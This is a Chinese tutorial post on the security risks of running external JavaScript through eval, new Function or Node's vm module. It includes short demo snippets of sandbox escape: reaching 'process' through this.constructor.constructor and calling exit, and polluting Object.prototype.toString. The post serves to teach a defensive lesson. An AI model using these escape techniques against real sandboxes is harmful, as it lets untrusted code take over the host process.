js安全问题:不安全的JS使用帮助_安全零基础入门

在某些特别的场景下,我们需要编译执行外部输入的JS代码。在浏览器端,我们可以借助new Function 、eval等API。而在 node 端,我们可以借助vm模块实现一个沙箱,运行外部输入的JS 代码。但无论是浏览器端,还是node端,这些操作都有安全隐患。外部输入的JS代码可以利用JS语言的特性,从而破坏主程序的环境。目前,笔者了解到主要有两种方式攻击

js安全问题:不安全的JS使用帮助

在某些特别的场景下,我们需要编译执行外部输入的JS代码。在浏览器端,我们可以借助new Function 、eval等API。而在 node 端,我们可以借助vm模块实现一个沙箱,运行外部输入的JS 代码。但无论是浏览器端,还是node端,这些操作都有安全隐患。

js安全问题:不安全的JS使用帮助_安全零基础入门

外部输入的JS代码可以利用JS语言的特性,从而破坏主程序的环境。目前,笔者了解到主要有两种方式攻击主程序

方式一:通过 new Function 、 eval 在创建时,能获取到全局变量的特性,对主程序的环境进行破坏。

以 vm 实现沙箱加载外部代码为例:

const vm = require('vm');
const script = new vm.Script(`
    var foo = (new Function('return process'))();
    foo.exit()
`)
const context = vm.createContext({
    Function: Function
})
script.runInContext(context) // 此处直接退出进程,下面的代码都不会执行
console.log("process is exited ?")

此段代码中,通过外部的Function构造器, 使得生成的函数能够访问到外部的上下文,拿到process对象,直接把进程退出了。

实际上,我们不传递Function给沙箱的话,沙箱内部的代码同样可以通过JS的原型链的机制,拿到外部的Function构造器:

const vm = require('vm');
const script = new vm.Script(`
    var foo = (new this.constructor.constructor('return process'))();
    foo.exit()
`)
const context = vm.createContext()  // 此处不把外部的Function传递进去
script.runInContext(context) // 此处直接退出进程,下面的代码都不会执行
console.log("process is exited ?")

上面的沙箱里面的代码,可以通过访问沙箱内部的上下文this的contructor属性拿到外部的Object构造器,再通过Object的contructor属性直接拿到外部的Function构造器。

方式二:通过原型链方法劫持、污染

同样以 vm 实现沙箱加载外部代码为例:

const vm = require('vm');
const script = new vm.Script(`
this.constructor.prototype.toString = function() {
    console.log("hehe")
}
`)
const context = vm.createContext({
    console: console
})
script.runInContext(context)
let a = { name: 1 }
console.log(a, a.toString())

内部沙箱代码通过获取外部的Object构造器,改写原型上的toString方法,达到原型链方法破坏的目的。

总结

由于JS某些神奇的语言特性,直接编译执行外部输入的JS代码,是一件很危险的操作。说到底,想要解决某些问题,必须先了解根源。

海计划公众号
(0)
上一篇 2020/03/29 01:43
下一篇 2020/03/29 01:43

您可能感兴趣的内容